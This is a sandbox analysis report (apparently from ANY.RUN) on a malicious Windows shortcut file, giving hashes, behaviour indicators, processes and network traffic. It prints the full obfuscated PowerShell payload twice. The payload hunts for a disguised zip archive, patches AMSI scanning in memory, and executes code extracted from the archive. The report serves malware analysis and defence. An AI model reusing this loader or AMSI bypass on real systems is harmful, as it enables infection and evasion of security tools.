File name:

_ba929388ae8b854a9c98b37c4dae2bda4f15dd1cad97388224c4f636d7d26c6c.lnk

Full analysis: https://app.any.run/tasks/01c05915-8edc-4051-aece-2104461f7700
Verdict: Malicious activity
Analysis date: April 17, 2026, 15:10:20
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
susp-lnk
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has command line arguments, Icon number=45, Unicoded, Archive, length=431104, window=showminnoactive, IDListSize 0x018d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\windows\system32\WindowsPowerShell\v1.0\Powershell.exe"
MD5:

15B14B9829F34521450E4E7D8D212052

SHA1:

F52840234797DFAEFD29E8C42CB3868CCC81EC96

SHA256:

BA929388AE8B854A9C98B37C4DAE2BDA4F15DD1CAD97388224C4F636D7D26C6C

SSDEEP:

96:8s0FL5rrSKC9CnAOcO7+1RNY5Evp/MCc8KtwxFssAwFlsaAyZAHcGgli:8s0FjC9CAOcO7wRNaEvp/MC/KtwzsTwi

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • References archive utilities (LNK)

      • powershell.exe (PID: 6816)

  • SUSPICIOUS

    • Obfuscation pattern (POWERSHELL)

      • powershell.exe (PID: 6816)

    • Escape characters obfuscation (POWERSHELL)

      • powershell.exe (PID: 6816)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, CommandArgs, IconFile, Unicode
FileAttributes: Archive
TargetFileSize: 431104
IconIndex: 45
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: Powershell.exe
DriveType: Fixed Disk
DriveSerialNumber: 0000-0000
VolumeLabel: -
LocalBasePath: C:\windows\system32\WindowsPowerShell\v1.0\Powershell.exe
CommandLineArguments: $ci=2;$TFhR='HkfDqfm';$znwZu='Dienstangebot_Hinterberger_J_07-04-26';$uTgUz='AllDirectories';$iL='\';$uEblg=(.('gci') env:LOCALAPPDATA).('Value')+$iL+$znwZu+'.zip'+$iL+$znwZu+'.zip';$zRv=.('test-path') $uEblg;if(!$zRv){$uEblg='.','Downloads','Documents','Desktop'|.('foreach-object'){(.('gci') env:USERPROFILE).('Value')+$iL+$_ }|.('foreach-object'){try{[IO.Directory]::('getfiles')($_,$znwZu+'.zip',$uTgUz)}catch{}}|.('select-object') -f ($ci-1);};if(!$uEblg){return};$sARqq='join';$ZbZSa=[type]('string');$TWJT=$ZbZSa::$sARqq('','Nam','e');$HsxN=$ZbZSa::$sARqq('','canC','ontentf7f81a39-5f63-5b42-9efd-1f13b5431005#39;);$UKL=$ZbZSa::$sARqq('','iUt','ilsf7f81a39-5f63-5b42-9efd-1f13b5431005#39;);$G=$ZbZSa::$sARqq('','NonPu','blic,Static');$U=[type]('ref');$NKE=$U.('Assembly').('GetTypes')();foreach($fdqwn in $NKE) {if($fdqwn.$TWJT -match $UKL){$ZOXE=$fdqwn}};$rO=$ZOXE.('GetMethods')($G);foreach($AQ in $rO) {if($AQ.$TWJT -match $HsxN){$HjGz=$AQ}};class B { static [int] A([string]$SA){return $SA[0]}};$O=([type]('B')).('GetMethod')('A');$ndcz=$ZbZSa::$sARqq('','Runtime.Intero','pServices.Marshal');$q=[type]($ndcz);$Hs=$q::('ReadIntPtr')([long]$O.('MethodHandle').('Value')+(10-$ci));$q::('Copy')(@($Hs),(2-$ci),[long]$HjGz.('MethodHandle').('Value')+(10-$ci),1);$f=[IO.File]::('ReadLines')($uEblg)|.('where-object'){$_ -match $TFhR}|.('select-object') -f ($ci-1);if(!$f){return};$sARqq='join';$ZbZSa=[type]'string';$hrYI='split';$clyd=$TFhR.('length');$EvYn=$f.('substring')($clyd);$C=$EvYn.$hrYI('`');$UyKmX=$ZbZSa::$sARqq('',$C);$znwZu=(41-$ci);$znwZu=[char]($znwZu);$QbMKJ='$l='+$znwZu+$uEblg+$znwZu+';'+$UyKmX;$UGHR=[type]'scriptblock';$JjPVA=$UGHR::create($QbMKJ);& $JjPVA;Write-Host '.';
IconFileName: %SystemRoot%\system32\SHELL32.dll
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
137
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
4136C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
6148\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6816"C:\windows\system32\WindowsPowerShell\v1.0\Powershell.exe" $ci=2;$TFhR='HkfDqfm';$znwZu='Dienstangebot_Hinterberger_J_07-04-26';$uTgUz='AllDirectories';$iL='\';$uEblg=(.('gci') env:LOCALAPPDATA).('Value')+$iL+$znwZu+'.zip'+$iL+$znwZu+'.zip';$zRv=.('test-path') $uEblg;if(!$zRv){$uEblg='.','Downloads','Documents','Desktop'|.('foreach-object'){(.('gci') env:USERPROFILE).('Value')+$iL+$_ }|.('foreach-object'){try{[IO.Directory]::('getfiles')($_,$znwZu+'.zip',$uTgUz)}catch{}}|.('select-object') -f ($ci-1);};if(!$uEblg){return};$sARqq='join';$ZbZSa=[type]('string');$TWJT=$ZbZSa::$sARqq('','Nam','e');$HsxN=$ZbZSa::$sARqq('','canC','ontentf7f81a39-5f63-5b42-9efd-1f13b5431005#39;);$UKL=$ZbZSa::$sARqq('','iUt','ilsf7f81a39-5f63-5b42-9efd-1f13b5431005#39;);$G=$ZbZSa::$sARqq('','NonPu','blic,Static');$U=[type]('ref');$NKE=$U.('Assembly').('GetTypes')();foreach($fdqwn in $NKE) {if($fdqwn.$TWJT -match $UKL){$ZOXE=$fdqwn}};$rO=$ZOXE.('GetMethods')($G);foreach($AQ in $rO) {if($AQ.$TWJT -match $HsxN){$HjGz=$AQ}};class B { static [int] A([string]$SA){return $SA[0]}};$O=([type]('B')).('GetMethod')('A');$ndcz=$ZbZSa::$sARqq('','Runtime.Intero','pServices.Marshal');$q=[type]($ndcz);$Hs=$q::('ReadIntPtr')([long]$O.('MethodHandle').('Value')+(10-$ci));$q::('Copy')(@($Hs),(2-$ci),[long]$HjGz.('MethodHandle').('Value')+(10-$ci),1);$f=[IO.File]::('ReadLines')($uEblg)|.('where-object'){$_ -match $TFhR}|.('select-object') -f ($ci-1);if(!$f){return};$sARqq='join';$ZbZSa=[type]'string';$hrYI='split';$clyd=$TFhR.('length');$EvYn=$f.('substring')($clyd);$C=$EvYn.$hrYI('`');$UyKmX=$ZbZSa::$sARqq('',$C);$znwZu=(41-$ci);$znwZu=[char]($znwZu);$QbMKJ='$l='+$znwZu+$uEblg+$znwZu+';'+$UyKmX;$UGHR=[type]'scriptblock';$JjPVA=$UGHR::create($QbMKJ);& $JjPVA;Write-Host '.';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
7 892
Read events
7 891
Write events
1
Delete events
0

Modification events

(PID) Process:(4136) slui.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\3d\52C64B7E
Operation:writeName:@%SystemRoot%\System32\sppcomapi.dll,-3200
Value:
Software Licensing
Executable files
0
Suspicious files
3
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
6816powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:9D7228CB227B10C780FEC9487753873D
SHA256:EFE76057587C58BDE13903090614C071860C1DD03CF9423711C2D63E5123586A
6816powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\aafae4b1b3a2d2a9.customDestinations-msbinary
MD5:8F7B7322CBD1E0C37F47F1521F6726D5
SHA256:C22E59C7EA6A79D14ACECD2D71DBCE9188346391E1EA29D2E0DA13A561663D80
6816powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rylpgp0h.ggz.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6816powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_11nvdnix.zmv.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6816powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZJLEASFR0Z0RSZRGBMK9.tempbinary
MD5:8F7B7322CBD1E0C37F47F1521F6726D5
SHA256:C22E59C7EA6A79D14ACECD2D71DBCE9188346391E1EA29D2E0DA13A561663D80
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
78
TCP/UDP connections
53
DNS requests
20
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5276
MoUsoCoreWorker.exe
GET
304
4.231.128.59:443
https://settings-win.data.microsoft.com/settings/v3.0/wsd/muse?ProcessorClockSpeed=3094&FlightIds=&UpdateOfferedDays=4294967295&BranchReadinessLevel=CB&OEMManufacturerName=DELL&IsCloudDomainJoined=0&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&sku=48&ActivationChannel=Retail&AttrDataVer=186&IsMDMEnrolled=0&ProcessorCores=6&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&TotalPhysicalRAM=6144&PrimaryDiskType=4294967295&FlightingBranchName=&ChassisTypeId=1&OEMModelNumber=DELL&SystemVolumeTotalCapacity=260281&sampleId=95271487&deviceClass=Windows.Desktop&App=muse&DisableDualScan=0&AppVer=10.0&OEMSubModel=J5CR&locale=en-US&IsAlwaysOnAlwaysConnectedCapable=0&ms=0&DefaultUserRegion=244&UpdateServiceUrl=http%3A%2F%2Fneverupdatewindows10.com&osVer=10.0.19045.4046.amd64fre.vb_release.191206-1406&os=windows&deviceId=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&DeferQualityUpdatePeriodInDays=0&ring=Retail&DeferFeatureUpdatePeriodInDays=30
US
whitelisted
6684
svchost.exe
GET
200
23.216.77.42:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
5276
MoUsoCoreWorker.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
US
binary
814 b
whitelisted
5316
svchost.exe
POST
200
40.126.31.73:443
https://login.live.com/RST2.srf
US
xml
1.24 Kb
whitelisted
5316
svchost.exe
POST
200
20.190.160.3:443
https://login.live.com/RST2.srf
US
xml
1.24 Kb
whitelisted
POST
400
20.190.160.3:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
text
203 b
whitelisted
5316
svchost.exe
POST
400
40.126.31.73:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
text
203 b
whitelisted
POST
400
20.190.160.3:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
binary
203 b
whitelisted
5316
svchost.exe
POST
400
40.126.31.73:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
text
203 b
whitelisted
6684
svchost.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
US
binary
814 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
Not routed
whitelisted
6684
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5276
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7824
slui.exe
48.192.1.64:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5532
SearchApp.exe
2.16.241.206:443
www.bing.com
AKAMAI-ASN1
NL
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
6684
svchost.exe
23.216.77.42:80
crl.microsoft.com
AKAMAI-ASN1
NL
whitelisted
6684
svchost.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
US
whitelisted
5276
MoUsoCoreWorker.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
US
whitelisted
5276
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 20.73.194.208
  • 40.127.240.158
whitelisted
activation-v2.sls.microsoft.com
  • 48.192.1.64
whitelisted
www.bing.com
  • 2.16.241.206
  • 2.16.241.218
  • 2.16.241.222
  • 2.16.241.205
  • 2.16.241.219
  • 2.16.241.201
  • 2.16.241.207
whitelisted
google.com
  • 172.217.20.142
whitelisted
crl.microsoft.com
  • 23.216.77.42
  • 23.216.77.8
  • 23.216.77.30
  • 23.216.77.25
  • 23.216.77.6
  • 23.216.77.20
  • 23.216.77.22
  • 23.216.77.28
  • 23.216.77.19
  • 23.216.77.36
whitelisted
www.microsoft.com
  • 88.221.169.152
  • 23.59.18.102
whitelisted
login.live.com
  • 40.126.31.73
  • 20.190.159.128
  • 20.190.159.71
  • 40.126.31.2
  • 20.190.159.64
  • 20.190.159.68
  • 20.190.159.130
  • 20.190.159.73
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
slscr.update.microsoft.com
  • 20.165.94.63
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 74.178.240.51
whitelisted

Threats

PID
Process
Class
Message
6684
svchost.exe
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
_ba929388ae8b854a9c98b37c4dae2bda4f15dd1cad97388224c4f636d7d26c6c.lnk